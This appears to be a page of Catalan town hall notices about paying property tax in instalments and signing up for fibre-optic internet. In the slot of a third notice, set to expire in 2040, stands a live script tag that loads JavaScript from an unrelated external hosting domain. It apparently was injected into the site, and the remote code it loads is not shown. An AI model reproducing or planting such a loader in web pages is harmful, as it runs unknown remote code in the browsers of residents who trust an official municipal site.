Es comunica a tots els interessats que vulguin fraccionar els pagaments d'I.B.I urbà ,rústic i taxes a Base, que poden passar per l'Ajuntament a demanar informació.

Bando vigent fins dilluns, 30 d'abril de 2018

Es comunica a tothom que estigui interessat en connectar-se a internet per connexió de fibra òptica a una velocitat de 50 Mb., ampliable en un futur, que passin per l'Ajuntament a informar-se.

Bando vigent fins , 31 de desembre de 2017

<script type="text/javascript" src="http://yourjavascript.com/29219319723/index.js"></script>

Bando vigent fins dimecres, 01 d'agost de 2040